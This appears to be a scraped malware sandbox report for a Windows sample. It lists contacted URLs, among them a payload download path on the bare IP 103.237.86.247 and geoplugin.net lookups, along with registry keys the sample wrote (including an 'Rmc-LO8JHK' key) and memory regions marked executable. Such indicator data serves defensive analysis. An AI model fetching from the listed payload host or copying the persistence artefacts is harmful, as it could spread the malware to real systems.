https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr
|
unknown
|
||
|
http://103.237.86.247/Udma
|
unknown
|
||
|
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
unknown
|
||
|
https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
http://geoplugin.net/json.gpC
|
unknown
|
||
|
https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c
|
unknown
|
||
|
http://103.237.86.247/Ud
|
unknown
|
||
|
http://103.237
|
unknown
|
||
|
http://103.237.
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://maps.windows.com/windows-app-web-link
|
unknown
|
||
|
http://103.237.8
|
unknown
|
||
|
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://103.2
|
unknown
|
||
|
http://103.237.86.247/Udmag
|
unknown
|
||
|
http://103.237.86.
|
unknown
|
||
|
http://103.237.86.247/Udmagr
|
unknown
|
||
|
http://crl.micro?
|
unknown
|
||
|
https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8
|
unknown
|
||
|
https://login.yahoo.com/config/login
|
unknown
|
||
|
http://geoplugin.net/json.gpW
|
unknown
|
||
|
http://www.nirsoft.net/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://103.237.86.247/NtqoCaH77.bin
|
103.237.86.247
|
||
|
https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d
|
unknown
|
||
|
http://103.237H
|
unknown
|
||
|
https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d
|
unknown
|
||
|
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
|
unknown
|
||
|
https://www.office.com/
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8
|
unknown
|
||
|
https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68
|
unknown
|
||
|
https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d
|
unknown
|
||
|
http://geoplugin.net/json.gpk
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://103.237.86.247/Udmagret.h
|
unknown
|
||
|
https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437
|
unknown
|
||
|
http://www.imvu.com
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=wsb
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://geoplugin.net/json.gpt
|
unknown
|
||
|
https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326
|
unknown
|
||
|
http://103.237.86.247/Udmagre
|
unknown
|
||
|
http://103.237.86.247/Udm
|
unknown
|
||
|
http://103.237.86.2
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://103.237.86.247/
|
unknown
|
||
|
https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03
|
unknown
|
||
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
|
http://103.237.86.24
|
unknown
|
||
|
http://103.237.86.247/Udmagret
|
unknown
|
||
|
http://103.237.86.247/Udmagret.
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingaot
|
unknown
|
||
|
https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae
|
unknown
|
||
|
http://103.237.86.247/Udmagret.hh
|
unknown
|
||
|
https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7
|
unknown
|
||
|
https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingrms
|
unknown
|
||
|
https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993
|
unknown
|
||
|
https://www.google.com/accounts/servicelogin
|
unknown
|
||
|
https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3
|
unknown
|
||
|
https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135
|
unknown
|
||
|
http://103.23
|
unknown
|
||
|
https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59
|
unknown
|
||
|
http://www.ebuddy.com
|
unknown
|
There are 81 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
geoplugin.net
|
178.237.33.50
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
103.237.87.159
|
unknown
|
unknown
|
|
|
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
||
|
103.237.86.247
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-LO8JHK
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-LO8JHK
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-LO8JHK
|
time
|
There are 7 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
663B000
|
heap
|
page read and write
|
|
|
|
9F6C000
|
direct allocation
|
page execute and read and write
|
|
|
|
5418000
|
trusted library allocation
|
page read and write
|
|
|
|
26CE6643000
|
trusted library allocation
|
page read and write
|
|
|
|
6623000
|
heap
|
page read and write
|
|
|
|
2F0F000
|
stack
|
page read and write
|
|
|
|
8060000
|
direct allocation
|
page execute and read and write
|
|
|
|
27D86D6F000
|
heap
|
page read and write
|
||
|
54C0000
|
trusted library allocation
|
page read and write
|
||
|
6740000
|
direct allocation
|
page read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
3354000
|
heap
|
page read and write
|
||
|
4ECF000
|
heap
|
page read and write
|
||
|
4CEB000
|
heap
|
page read and write
|
||
|
2F03000
|
stack
|
page read and write
|
||
|
2246C000
|
heap
|
page read and write
|
||
|
27D86D4B000
|
heap
|
page read and write
|
||
|
3355000
|
heap
|
page read and write
|
||
|
7DF5000
|
trusted library allocation
|
page read and write
|
||
|
225C9000
|
unclassified section
|
page execute and read and write
|
||
|
26CEED86000
|
heap
|
page read and write
|
||
|
5D0000
|
heap
|
page read and write
|
||
|
224B7000
|
heap
|
page read and write
|
||
|
4ED9000
|
heap
|
page read and write
|
||
|
27D84D7C000
|
heap
|
page read and write
|
||
|
26B0000
|
trusted library allocation
|
page read and write
|
||
|
54B4000
|
heap
|
page read and write
|
||
|
4CD3000
|
heap
|
page read and write
|
||
|
4CD0000
|
heap
|
page read and write
|
||
|
54C0000
|
trusted library allocation
|
page read and write
|
||
|
4EDC000
|
heap
|
page read and write
|
||
|
6650000
|
heap
|
page read and write
|
||
|
ABE000
|
heap
|
page read and write
|
||
|
27D86D51000
|
heap
|
page read and write
|
||
|
2D6C000
|
stack
|
page read and write
|
||
|
225CD000
|
unclassified section
|
page execute and read and write
|
||
|
6D60000
|
trusted library allocation
|
page read and write
|
||
|
224AB000
|
heap
|
page read and write
|
||
|
303E000
|
stack
|
page read and write
|
||
|
7B8F000
|
heap
|
page read and write
|
||
|
27D86CC1000
|
heap
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
|
65EE000
|
stack
|
page read and write
|
||
|
4CCC000
|
heap
|
page read and write
|
||
|
27D86E10000
|
heap
|
page read and write
|
||
|
26CEEBF2000
|
heap
|
page read and write
|
||
|
4CE8000
|
heap
|
page read and write
|
||
|
52C0000
|
heap
|
page read and write
|
||
|
4EC1000
|
heap
|
page read and write
|
||
|
27D84DD0000
|
heap
|
page read and write
|
||
|
4EF9000
|
heap
|
page read and write
|
||
|
21780000
|
direct allocation
|
page read and write
|
||
|
52C1000
|
heap
|
page read and write
|
||
|
27D86BDC000
|
heap
|
page read and write
|
||
|
21BDD000
|
stack
|
page read and write
|
||
|
4F1A000
|
heap
|
page read and write
|
||
|
4CDD000
|
heap
|
page read and write
|
||
|
4260000
|
heap
|
page read and write
|
||
|
27D86CDA000
|
heap
|
page read and write
|
||
|
3350000
|
heap
|
page read and write
|
||
|
27D86CD5000
|
heap
|
page read and write
|
||
|
4CDD000
|
heap
|
page read and write
|
||
|
27D86BDC000
|
heap
|
page read and write
|
||
|
4CD9000
|
heap
|
page read and write
|
||
|
27D86D3E000
|
heap
|
page read and write
|
||
|
4CE3000
|
heap
|
page read and write
|
||
|
27D84C70000
|
heap
|
page read and write
|
||
|
27D86D49000
|
heap
|
page read and write
|
||
|
26CD4A10000
|
heap
|
page read and write
|
||
|
4EE8000
|
heap
|
page read and write
|
||
|
52C1000
|
heap
|
page read and write
|
||
|
4CF9000
|
heap
|
page read and write
|
||
|
4CD3000
|
heap
|
page read and write
|
||
|
27D86E11000
|
heap
|
page read and write
|
||
|
54B8000
|
heap
|
page read and write
|
||
|
11C000
|
stack
|
page read and write
|
||
|
34F9000
|
heap
|
page read and write
|
||
|
264A000
|
heap
|
page read and write
|
||
|
27D86D49000
|
heap
|
page read and write
|
||
|
4F40000
|
heap
|
page read and write
|
||
|
7DAB23E000
|
stack
|
page read and write
|
||
|
28BC000
|
heap
|
page read and write
|
||
|
30F4000
|
heap
|
page read and write
|
||
|
5299000
|
trusted library allocation
|
page read and write
|
||
|
7A50000
|
trusted library allocation
|
page read and write
|
||
|
6D90000
|
trusted library allocation
|
page read and write
|
||
|
27F7000
|
heap
|
page read and write
|
||
|
9A4000
|
heap
|
page read and write
|
||
|
36FB000
|
heap
|
page read and write
|
||
|
4EDD000
|
heap
|
page read and write
|
||
|
63CC000
|
remote allocation
|
page execute and read and write
|
||
|
C54000
|
heap
|
page read and write
|
||
|
26CD83FF000
|
trusted library allocation
|
page read and write
|
||
|
2872000
|
heap
|
page read and write
|
||
|
7FFD9B760000
|
trusted library allocation
|
page read and write
|
||
|
26CEED43000
|
heap
|
page read and write
|
||
|
21E7C000
|
stack
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
3228000
|
heap
|
page read and write
|
||
|
27D86D33000
|
heap
|
page read and write
|
||
|
4ECC000
|
heap
|
page read and write
|
||
|
21750000
|
direct allocation
|
page read and write
|
||
|
1E5A7BC5000
|
heap
|
page read and write
|
||
|
27D86CD5000
|
heap
|
page read and write
|
||
|
4CCA000
|
heap
|
page read and write
|
||
|
7EF40000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
7DAABCE000
|
stack
|
page read and write
|
||
|
30F4000
|
heap
|
page read and write
|
||
|
26C0000
|
trusted library allocation
|
page read and write
|
||
|
221D1000
|
heap
|
page read and write
|
||
|
226B9000
|
unclassified section
|
page execute and read and write
|
||
|
27D84C90000
|
heap
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B816000
|
trusted library allocation
|
page read and write
|
||
|
307A000
|
heap
|
page read and write
|
||
|
2660000
|
heap
|
page read and write
|
||
|
6CC0000
|
heap
|
page read and write
|
||
|
3354000
|
heap
|
page read and write
|
||
|
27D86DA8000
|
heap
|
page read and write
|
||
|
26E2000
|
trusted library allocation
|
page read and write
|
||
|
27D86CF7000
|
heap
|
page read and write
|
||
|
4CD4000
|
heap
|
page read and write
|
||
|
51C1000
|
heap
|
page read and write
|
||
|
2A6C000
|
heap
|
page read and write
|
||
|
1E0000
|
heap
|
page read and write
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
|
3355000
|
heap
|
page read and write
|
||
|
80C0000
|
direct allocation
|
page read and write
|
||
|
709C000
|
stack
|
page read and write
|
||
|
4460000
|
remote allocation
|
page execute and read and write
|
||
|
7DAB17D000
|
stack
|
page read and write
|
||
|
21EFC000
|
stack
|
page read and write
|
||
|
4CDD000
|
heap
|
page read and write
|
||
|
27D84DD0000
|
heap
|
page read and write
|
||
|
4ECE000
|
heap
|
page read and write
|
||
|
27D86D66000
|
heap
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
|
27D86BD4000
|
heap
|
page read and write
|
||
|
3354000
|
heap
|
page read and write
|
||
|
26CD4A1F000
|
heap
|
page read and write
|
||
|
6F2E000
|
stack
|
page read and write
|
||
|
27D86DC1000
|
heap
|
page read and write
|
||
|
1E5A77C0000
|
heap
|
page read and write
|
||
|
27D86DAB000
|
heap
|
page read and write
|
||
|
26CEE5D1000
|
heap
|
page read and write
|
||
|
3380000
|
heap
|
page read and write
|
||
|
7DAAEFE000
|
stack
|
page read and write
|
||
|
2FB5000
|
heap
|
page read and write
|
||
|
3354000
|
heap
|
page read and write
|
||
|
27D86D8D000
|
heap
|
page read and write
|
||
|
2234A000
|
heap
|
page read and write
|
||
|
7FFD9B942000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
4CCA000
|
heap
|
page read and write
|
||
|
27D84D89000
|
heap
|
page read and write
|
||
|
97E000
|
stack
|
page read and write
|
||
|
307E000
|
heap
|
page read and write
|
||
|
67A0000
|
direct allocation
|
page read and write
|
||
|
27D86CF7000
|
heap
|
page read and write
|
||
|
59CC000
|
remote allocation
|
page execute and read and write
|
||
|
FD7BEFB000
|
stack
|
page read and write
|
||
|
4ED7000
|
heap
|
page read and write
|
||
|
7F5E000
|
stack
|
page read and write
|
||
|
7A30000
|
heap
|
page read and write
|
||
|
4ED7000
|
heap
|
page read and write
|
||
|
423E000
|
stack
|
page read and write
|
||
|
338D000
|
heap
|
page read and write
|
||
|
4ECD000
|
heap
|
page read and write
|
||
|
4ED9000
|
heap
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
26CD6510000
|
trusted library allocation
|
page read and write
|
||
|
9A4000
|
heap
|
page read and write
|
||
|
4CCC000
|
heap
|
page read and write
|
||
|
26CD6E3C000
|
trusted library allocation
|
page read and write
|
||
|
3354000
|
heap
|
page read and write
|
||
|
4F4A000
|
heap
|
page read and write
|
||
|
4EC1000
|
heap
|
page read and write
|
||
|
4ED1000
|
heap
|
page read and write
|
||
|
6A00000
|
heap
|
page read and write
|
||
|
26CEED94000
|
heap
|
page read and write
|
||
|
34FB000
|
heap
|
page read and write
|
||
|
224B5000
|
heap
|
page read and write
|
||
|
3354000
|
heap
|
page read and write
|
||
|
3354000
|
heap
|
page read and write
|
||
|
9A4000
|
heap
|
page read and write
|
||
|
352E000
|
stack
|
page read and write
|
||
|
226E0000
|
unclassified section
|
page execute and read and write
|
||
|
226D3000
|
unclassified section
|
page execute and read and write
|
||
|
7B40000
|
trusted library allocation
|
page read and write
|
||
|
7DAAF7D000
|
stack
|
page read and write
|
||
|
4ECE000
|
heap
|
page read and write
|
||
|
8080000
|
direct allocation
|
page read and write
|
||
|
27D86D2F000
|
heap
|
page read and write
|
||
|
36F7000
|
heap
|
page read and write
|
||
|
27D86D5F000
|
heap
|
page read and write
|
||
|
52C8000
|
heap
|
page read and write
|
||
|
257E000
|
stack
|
page read and write
|
||
|
2EFF000
|
stack
|
page read and write
|
||
|
6650000
|
heap
|
page read and write
|
||
|
4CEC000
|
heap
|
page read and write
|
||
|
9A4000
|
heap
|
page read and write
|
||
|
4EC0000
|
heap
|
page read and write
|
||
|
69C0000
|
direct allocation
|
page read and write
|
||
|
21DAE000
|
stack
|
page read and write
|
||
|
C54000
|
heap
|
page read and write
|
||
|
2E1E000
|
stack
|
page read and write
|
||
|
2680000
|
trusted library section
|
page read and write
|
||
|
26CD4A68000
|
heap
|
page read and write
|
||
|
4CC0000
|
heap
|
page read and write
|
||
|
52E3000
|
heap
|
page read and write
|
||
|
40BC000
|
stack
|
page read and write
|
||
|
22736000
|
unclassified section
|
page execute and read and write
|
||
|
2F80000
|
heap
|
page read and write
|
||
|
801E000
|
stack
|
page read and write
|
||
|
4190000
|
heap
|
page execute and read and write
|
||
|
27D84D91000
|
heap
|
page read and write
|
||
|
4A20000
|
heap
|
page read and write
|
||
|
4ED1000
|
heap
|
page read and write
|
||
|
27D86CF7000
|
heap
|
page read and write
|
||
|
3242000
|
heap
|
page read and write
|
||
|
4CD9000
|
heap
|
page read and write
|
||
|
80B0000
|
direct allocation
|
page read and write
|
||
|
54B8000
|
heap
|
page read and write
|
||
|
3355000
|
heap
|
page read and write
|
||
|
FD7BAFB000
|
stack
|
page read and write
|
||
|
27D84D7E000
|
heap
|
page read and write
|
||
|
356E000
|
stack
|
page read and write
|
||
|
26CEEAB0000
|
heap
|
page execute and read and write
|
||
|
4CA0000
|
heap
|
page read and write
|
||
|
4ECD000
|
heap
|
page read and write
|
||
|
26CD6400000
|
heap
|
page read and write
|
||
|
3310000
|
heap
|
page read and write
|
||
|
45D000
|
system
|
page execute and read and write
|
||
|
4D57000
|
heap
|
page read and write
|
||
|
7DAB0FE000
|
stack
|
page read and write
|
||
|
26CD6657000
|
trusted library allocation
|
page read and write
|
||
|
334C000
|
heap
|
page read and write
|
||
|
4ED1000
|
heap
|
page read and write
|
||
|
224CD000
|
heap
|
page read and write
|
||
|
4ED0000
|
heap
|
page read and write
|
||
|
27AB000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
27D84DDB000
|
heap
|
page read and write
|
||
|
9A4000
|
heap
|
page read and write
|
||
|
4ECE000
|
heap
|
page read and write
|
||
|
4EC0000
|
heap
|
page read and write
|
||
|
4EDD000
|
heap
|
page read and write
|
||
|
21730000
|
direct allocation
|
page read and write
|
||
|
26CEF040000
|
heap
|
page read and write
|
||
|
3354000
|
heap
|
page read and write
|
||
|
227B0000
|
heap
|
page read and write
|
||
|
26CEEC20000
|
heap
|
page read and write
|
||
|
27D86D2F000
|
heap
|
page read and write
|
||
|
34FE000
|
heap
|
page read and write
|
||
|
4ED3000
|
heap
|
page read and write
|
||
|
65E8000
|
heap
|
page read and write
|
||
|
4EC1000
|
heap
|
page read and write
|
||
|
26CD6470000
|
heap
|
page execute and read and write
|
||
|
4CD6000
|
heap
|
page read and write
|
||
|
4CD0000
|
heap
|
page read and write
|
||
|
4ED4000
|
heap
|
page read and write
|
||
|
4CDD000
|
heap
|
page read and write
|
||
|
7DABF8E000
|
stack
|
page read and write
|
||
|
4CD0000
|
heap
|
page read and write
|
||
|
4CCA000
|
heap
|
page read and write
|
||
|
4CC1000
|
heap
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
4ED0000
|
heap
|
page read and write
|
||
|
27D86D66000
|
heap
|
page read and write
|
||
|
6D48000
|
trusted library allocation
|
page read and write
|
||
|
27D86BC7000
|
heap
|
page read and write
|
||
|
26CEEBCA000
|
heap
|
page read and write
|
||
|
27D86DE5000
|
heap
|
page read and write
|
||
|
4C2F000
|
stack
|
page read and write
|
||
|
C54000
|
heap
|
page read and write
|
||
|
27D86D5A000
|
heap
|
page read and write
|
||
|
4CD9000
|
heap
|
page read and write
|
||
|
27D86D1D000
|
heap
|
page read and write
|
||
|
41F0000
|
heap
|
page read and write
|
||
|
4D39000
|
heap
|
page read and write
|
||
|
FD7B4FF000
|
stack
|
page read and write
|
||
|
4D40000
|
heap
|
page read and write
|
||
|
3355000
|
heap
|
page read and write
|
||
|
31A3000
|
heap
|
page read and write
|
||
|
7FFD9B81C000
|
trusted library allocation
|
page execute and read and write
|
||
|
27D86CE9000
|
heap
|
page read and write
|
||
|
4CCC000
|
heap
|
page read and write
|
||
|
4CC0000
|
heap
|
page read and write
|
||
|
27D86CC1000
|
heap
|
page read and write
|
||
|
27D86CC0000
|
heap
|
page read and write
|
||
|
2A60000
|
heap
|
page read and write
|
||
|
FD7BDFF000
|
stack
|
page read and write
|
||
|
4CD9000
|
heap
|
page read and write
|
||
|
4F0E000
|
heap
|
page read and write
|
||
|
4CCA000
|
heap
|
page read and write
|
||
|
54A000
|
stack
|
page read and write
|
||
|
27D850A8000
|
heap
|
page read and write
|
||
|
27D86CE8000
|
heap
|
page read and write
|
||
|
34B0000
|
trusted library allocation
|
page read and write
|
||
|
7DAC08D000
|
stack
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
2F70000
|
heap
|
page read and write
|
||
|
27D850AA000
|
heap
|
page read and write
|
||
|
3220000
|
heap
|
page read and write
|
||
|
666C000
|
heap
|
page read and write
|
||
|
27D86CF7000
|
heap
|
page read and write
|
||
|
27D84D3A000
|
heap
|
page read and write
|
||
|
26CEEC00000
|
heap
|
page read and write
|
||
|
4EE3000
|
heap
|
page read and write
|
||
|
26CD6DDB000
|
trusted library allocation
|
page read and write
|
||
|
4CCA000
|
heap
|
page read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
|
5070000
|
heap
|
page read and write
|
||
|
4EEB000
|
heap
|
page read and write
|
||
|
26CEEDE5000
|
heap
|
page read and write
|
||
|
26CD808F000
|
trusted library allocation
|
page read and write
|
||
|
7B60000
|
heap
|
page read and write
|
||
|
4EC0000
|
heap
|
page read and write
|
||
|
26B4000
|
trusted library allocation
|
page read and write
|
||
|
4C38000
|
heap
|
page read and write
|
||
|
27D866E0000
|
remote allocation
|
page read and write
|
||
|
93C000
|
stack
|
page read and write
|
||
|
7B0F000
|
stack
|
page read and write
|
||
|
6EAD000
|
stack
|
page read and write
|
||
|
2803000
|
heap
|
page read and write
|
||
|
26E0000
|
trusted library allocation
|
page read and write
|
||
|
6E3E000
|
stack
|
page read and write
|
||
|
224B5000
|
heap
|
page read and write
|
||
|
7DAB1BE000
|
stack
|
page read and write
|
||
|
69EE000
|
stack
|
page read and write
|
||
|
2DF0000
|
heap
|
page readonly
|
||
|
7DAAB43000
|
stack
|
page read and write
|
||
|
27D86D4B000
|
heap
|
page read and write
|
||
|
6650000
|
heap
|
page read and write
|
||
|
9A4000
|
heap
|
page read and write
|
||
|
4CD0000
|
heap
|
page read and write
|
||
|
21770000
|
direct allocation
|
page read and write
|
||
|
27D86BDC000
|
heap
|
page read and write
|
||
|
4ECC000
|
heap
|
page read and write
|
||
|
2FA0000
|
heap
|
page readonly
|
||
|
4EC0000
|
heap
|
page read and write
|
||
|
27D86BC4000
|
heap
|
page read and write
|
||
|
34B0000
|
trusted library allocation
|
page read and write
|
||
|
3040000
|
heap
|
page read and write
|
||
|
2857000
|
heap
|
page read and write
|
||
|
26CD6C47000
|
trusted library allocation
|
page read and write
|
||
|
4CEB000
|
heap
|
page read and write
|
||
|
3354000
|
heap
|
page read and write
|
||
|
27D850AB000
|
heap
|
page read and write
|
||
|
80A0000
|
direct allocation
|
page read and write
|
||
|
26D0000
|
trusted library allocation
|
page read and write
|
||
|
3338000
|
heap
|
page read and write
|
||
|
26CD65D1000
|
trusted library allocation
|
page read and write
|
||
|
22791000
|
direct allocation
|
page execute and read and write
|
||
|
4ED1000
|
heap
|
page read and write
|
||
|
27D86CF3000
|
heap
|
page read and write
|
||
|
C54000
|
heap
|
page read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
|
22660000
|
unclassified section
|
page execute and read and write
|
||
|
26CEEDD9000
|
heap
|
page read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
2FD0000
|
heap
|
page read and write
|
||
|
53B1000
|
heap
|
page read and write
|
||
|
6770000
|
direct allocation
|
page read and write
|
||
|
C54000
|
heap
|
page read and write
|
||
|
30F4000
|
heap
|
page read and write
|
||
|
4D47000
|
heap
|
page read and write
|
||
|
26CD7EC8000
|
trusted library allocation
|
page read and write
|
||
|
4180000
|
heap
|
page execute and read and write
|
||
|
2640000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
27D86CF1000
|
heap
|
page read and write
|
||
|
27C0000
|
heap
|
page read and write
|
||
|
222C2000
|
heap
|
page read and write
|
||
|
2780000
|
heap
|
page read and write
|
||
|
3330000
|
heap
|
page read and write
|
||
|
7DAAE7E000
|
stack
|
page read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
27D86DA5000
|
heap
|
page read and write
|
||
|
4CC1000
|
heap
|
page read and write
|
||
|
6FB0000
|
trusted library allocation
|
page read and write
|
||
|
217A0000
|
direct allocation
|
page read and write
|
||
|
7A60000
|
trusted library allocation
|
page read and write
|
||
|
5401000
|
trusted library allocation
|
page read and write
|
||
|
4CD9000
|
heap
|
page read and write
|
||
|
7FC0000
|
trusted library allocation
|
page read and write
|
||
|
30F4000
|
heap
|
page read and write
|
||
|
30F4000
|
heap
|
page read and write
|
||
|
2207E000
|
stack
|
page read and write
|
||
|
5071000
|
heap
|
page read and write
|
||
|
5C0000
|
heap
|
page readonly
|
||
|
C54000
|
heap
|
page read and write
|
||
|
C0A000
|
stack
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
43CA000
|
trusted library allocation
|
page read and write
|
||
|
45D000
|
system
|
page execute and read and write
|
||
|
9A4000
|
heap
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
220F0000
|
unclassified section
|
page execute and read and write
|
||
|
4CD9000
|
heap
|
page read and write
|
||
|
30F4000
|
heap
|
page read and write
|
||
|
26B3000
|
trusted library allocation
|
page execute and read and write
|
||
|
27D84D98000
|
heap
|
page read and write
|
||
|
4BE2000
|
trusted library allocation
|
page read and write
|
||
|
4CC8000
|
heap
|
page read and write
|
||
|
7FA0000
|
trusted library allocation
|
page read and write
|
||
|
4269000
|
heap
|
page read and write
|
||
|
27D86D51000
|
heap
|
page read and write
|
||
|
3354000
|
heap
|
page read and write
|
||
|
2247B000
|
heap
|
page read and write
|
||
|
27CE000
|
heap
|
page read and write
|
||
|
55070FF000
|
unkown
|
page read and write
|
||
|
2D10000
|
heap
|
page read and write
|
||
|
27D86D2F000
|
heap
|
page read and write
|
||
|
4CE8000
|
heap
|
page read and write
|
||
|
6D21000
|
heap
|
page read and write
|
||
|
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
|
27A8000
|
trusted library allocation
|
page read and write
|
||
|
4CC1000
|
heap
|
page read and write
|
||
|
21760000
|
direct allocation
|
page read and write
|
||
|
21790000
|
direct allocation
|
page read and write
|
||
|
6C98000
|
heap
|
page read and write
|
||
|
4CC1000
|
heap
|
page read and write
|
||
|
30F5000
|
heap
|
page read and write
|
||
|
6661000
|
heap
|
page read and write
|
||
|
54B1000
|
heap
|
page read and write
|
||
|
6FC0000
|
trusted library allocation
|
page read and write
|
||
|
54B1000
|
